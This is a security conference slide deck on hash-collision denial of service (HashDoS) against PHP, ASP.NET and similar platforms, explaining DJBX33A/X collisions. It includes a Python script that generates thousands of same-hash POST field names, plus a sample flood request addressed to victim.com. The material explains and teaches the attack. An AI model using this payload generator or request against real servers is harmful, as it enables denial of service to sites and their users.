Hash Collision DoS Presentation

Layer-7 DoS
Hash Collisions
About Hybrid Security
Provide cyber fraud protection to websites
Prevent business logic attacks on web applications
Heuristic web user behavior analysis
Signature-free 0-day attack detection
Layer-7 DoS
• Slowloris: written by RSnake, exploits slow HTTP headers
• R.U.Dead.Yet: written by Raviv Raz, exploits slow POST fields
• Keep-Dead: written by Esrun, exploits long Keep-Alive sessions
• All three tie up connection slots; Hash DoS (next) instead burns CPU with a single, well-formed request
Hash DoS
• HashDoS advisory published by Julian Wälde & Alexander Klink, Dec. 28, 2011 (28C3)
• Vulnerability in ASP.NET (MS11-100)
• Vulnerability in PHP 4 and 5
• Also vulnerable: Java, Tomcat, Python, Ruby, Oracle
Hash Tables
[Figure: hash table with the keys login=root and passwd=123, each hashed to its own bucket]
• Insert, search and delete cost O(1) per node when keys spread over the buckets, so n operations cost O(n)
Hash Collisions
[Figure: the keys EzEz=123, EzFY=123 and FYEz=123 all land in the same bucket]
• When h(Ez) = h(FY)… every key lands in one chain, and each insert, search or delete walks the whole chain
• O(n) per node, O(n²) for n insertions
DJBX33A Hashing
• Daniel J. Bernstein, "times 33 with addition": h = h·33 + c
• Used in 32-bit PHP 5; Java and Tomcat use the same shape with multiplier 31
• Similar function used in Ruby
Hashing With the Pigeons
• A hash function maps a large set of strings onto a small set of hash values, so it is necessarily non-injective
• More commonly known as the pigeonhole principle: with more strings than hash values, some strings must share a value
[Figure: many Strings on the left mapped onto fewer Hashes on the right]
DJBX33X Hashing
• Daniel J. Bernstein, "times 33 with XOR": h = (h·33) ⊕ c
• Used in 32/64-bit PHP 4 and ASP.NET
• Similar function used in Python
Linear Collision Generation
(multiplier 31, as in Java's String.hashCode(); 'E' = 69, 'y' = 121, 'F' = 70, 'Z' = 90, 'a' = 97)
h('Ey') = 31¹·69 + 31⁰·121 = 2260
h('FZ') = 31¹·70 + 31⁰·90 = 2260
h('Eya') = 31·(31¹·69 + 31⁰·121) + 31⁰·97
        = 31·(31¹·70 + 31⁰·90) + 31⁰·97
        = h('FZa')
• Appending a common suffix (or prepending a common prefix) preserves the collision, so one colliding character pair yields colliding strings of any length
DEMO
Using Binary Permutations
• With h('Ez') = h('FY') under DJBX33A, read each two-character block as one bit:
h('EzEz') (00) = h('EzFY') (01) = h('FYEz') (10) = h('FYFY') (11)
• k blocks give 2ᵏ distinct keys with a single hash value
Pre-computing rainbow tables
• Calculate long permutations of colliding character pairs
• Create many same-hash field names for one POST request
• Meet-in-the-middle techniques improve table creation exponentially: two half-length searches replace one full-length search
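The collision arithmetic on the slides above, from the two-character pairs through the binary permutations to the same-hash POST field names, carried through as an added Python example (not code from the presentation or from Hybrid Security). It assumes DJBX33A as PHP 5 uses it (multiplier 33, initial value 5381) and the multiplier-31 form of Java's String.hashCode(); the chained table that counts key comparisons is a toy model, not PHP's HashTable, and its bucket count and the random "benign" keys are constructed only for the comparison.

```python
"""Hash-collision DoS worked example (added here; not the presentation's code).

Reproduces the slide collisions for DJBX33A (multiplier 33, PHP 5) and the
times-31 hash of Java's String.hashCode(), expands a colliding pair into 4**k
same-hash POST field names, and measures the O(n^2) blow-up in a toy chained
hash table.  The toy table and its bucket count are assumptions, not PHP's
real implementation.
"""
import itertools
import random
import string
from urllib.parse import quote

MASK32 = 0xFFFFFFFF
PHP_SEED = 5381            # initial value of PHP 5's zend_inline_hash_func()


def times_k_add(s: bytes, mult: int = 33, seed: int = 0) -> int:
    """h = h*mult + c over the bytes, truncated to 32 bits (DJBX33A for mult=33).
    seed=0 reproduces the slide arithmetic; PHP starts at 5381, which only adds a
    constant shared by all strings of one length and so never breaks a collision."""
    h = seed
    for c in s:
        h = (h * mult + c) & MASK32
    return h


def colliding_pairs(target: int, mult: int = 33, alphabet=range(0x01, 0x80)) -> list:
    """Every two-byte string c1c2 with mult*c1 + c2 == target ("equivalent
    substrings").  For target 2399 and mult 33 this is Ez, FY, G8 and H\\x17."""
    found = []
    for c1 in alphabet:
        c2 = target - mult * c1
        if c2 in alphabet:
            found.append(bytes([c1, c2]))
    return found


def colliding_keys(blocks: list, count: int) -> list:
    """Concatenate `count` blocks in every combination (len(blocks)**count keys).
    h(B1..Bk) = sum(mult**(2*(k-i)) * h(Bi)); with every h(Bi) equal, each
    combination hashes the same: the slide's binary-permutation trick."""
    return [b"".join(combo) for combo in itertools.product(blocks, repeat=count)]


def post_body(keys: list) -> str:
    """application/x-www-form-urlencoded body with one empty field per key."""
    return "&".join(quote(k, safe="") + "=" for k in keys)


class ChainedTable:
    """Toy separate-chaining table (an assumption, not PHP's HashTable): the
    bucket is the masked DJBX33A value and `probes` counts key comparisons,
    the work that grows quadratically once every key shares one bucket."""

    def __init__(self, nbuckets: int = 1 << 16):
        self.buckets = [[] for _ in range(nbuckets)]
        self.probes = 0

    def insert(self, key: bytes, value=None) -> None:
        chain = self.buckets[times_k_add(key, 33, PHP_SEED) & (len(self.buckets) - 1)]
        for entry in chain:            # walk the chain looking for an existing key
            self.probes += 1
            if entry[0] == key:
                entry[1] = value
                return
        chain.append([key, value])


def probes_for(keys: list) -> int:
    """Total key comparisons needed to insert `keys` into a fresh table."""
    table = ChainedTable()
    for k in keys:
        table.insert(k)
    return table.probes


def random_keys(n: int, seed: int = 1) -> list:
    """Constructed benign field names (10 random letters each) for comparison."""
    rng = random.Random(seed)
    return ["".join(rng.choices(string.ascii_letters, k=10)).encode() for _ in range(n)]


if __name__ == "__main__":
    pairs = colliding_pairs(times_k_add(b"Ez"))        # [b'Ez', b'FY', b'G8', b'H\x17']
    keys = colliding_keys(pairs, 8)                    # 4**8 = 65536 keys of 16 bytes
    assert len({times_k_add(k) for k in keys}) == 1    # all share one DJBX33A value
    print(post_body(keys[:4]))                         # EzEzEzEzEzEzEzEz=&EzEzEzEzEzEzEzFY=&...
    evil = colliding_keys(pairs, 5)                    # 1024 colliding keys
    print("colliding:", probes_for(evil), "benign:", probes_for(random_keys(len(evil))))
```

Run stand-alone it prints the first four field names from the POST slide (the `%17` is the raw byte 0x17 URL-encoded) and the comparison counts: 1024 colliding keys cost 1024·1023/2 = 523,776 key comparisons, while the same number of benign keys cost a few. Nothing in the toy table is PHP-specific beyond the hash function; any chained table keyed by an unseeded multiplicative hash shows the same curve.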
PHP 5
• DJBX33A
• 1 Gbit/s of attack traffic keeps ~10,000 i7 cores busy
• POST size limited by post_max_size (8 MB by default)
• Parsing time limited by max_input_time (default on Ubuntu/BSD = 60 seconds)
• The script need not read the data: PHP builds the $_POST hash table before any user code runs
<?php echo $_POST["param"]; ?>
ASP.NET
• DJBX33X
• Breakable using Meet-In-The-Middle
• 30 kbit/s keeps one Core 2 CPU busy
• 1 Gbit/s keeps ~30,000 Core 2 CPUs busy
<% Response.Write(Request.Form["param"]); %>
POST / HTTP/1.1
Host: victim.com
Connection: keep-alive
Content-Length: 1000000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Cookie: __utmz=181569312.1294666144.1.1

EzEzEzEzEzEzEzEz=&EzEzEzEzEzEzEzFY=&EzEzEzEzEzEzEzG8=&EzEzEzEzEzEzEzH%17=&…
(every 16-character field name hashes to the same DJBX33A value; %17 is the raw byte 0x17)
PoC already in the wild
Thank You
raviv@hybridsec.com
http://www.hybridsec.com